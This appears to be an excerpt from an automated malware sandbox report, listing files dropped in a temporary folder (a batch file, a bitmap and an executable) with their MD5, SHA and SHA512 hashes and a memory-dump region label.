C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat

MD5 b11c0b55dba339bbe3169584fa0eedd8
SHA1 8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256 f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA512 8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

memory/5032-76-0x0000000000400000-0x000000000132F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C498.tmp\blood.bmp

MD5 040d29b801e3488f7aee3f9708128eea
SHA1 433591a971325f7529cbb7a1d16645ff65ee10c7
SHA256 fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de
SHA512 79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

C:\Users\Admin\AppData\Local\Temp\C498.tmp\Service64.exe

MD5 b53852cb556ec28efc39b986caddb791
SHA1 5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a
SHA256 ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a
SHA512 7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599